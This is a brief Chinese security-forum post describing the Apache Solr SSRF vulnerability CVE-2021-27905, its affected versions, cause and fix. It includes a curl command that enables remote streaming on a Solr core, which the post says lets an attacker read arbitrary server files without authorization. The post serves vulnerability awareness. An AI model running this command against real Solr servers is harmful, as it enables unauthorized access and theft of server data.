安全矩阵

 找回密码
 立即注册
搜索
查看: 1428|回复: 0

Apache Solr SSRF 漏洞(CVE-2021-27905)

[复制链接]

63

主题

125

帖子

457

积分

中级会员

Rank: 3Rank: 3

积分
457
发表于 2021-10-13 17:53:57 | 显示全部楼层 |阅读模式
Apache Solr SSRF 漏洞(CVE-2021-27905)影响范围
Apache Solr <= 8.8.1(全版本)
打开网页
点击左侧的Core Admin来创建一个Core,可以发现报错
在本机输入下列指令即可读取任意文件
curl -d '{ "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://192.168.1.192:36299//solr/new_core/config -H 'Content-type:application/json'


该漏洞是由于没有对输入的内容进行校验,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行SSRF攻击,最终造成任意读取服务器上的文件。
修复
更新版本

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 02:34 , Processed in 0.012070 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表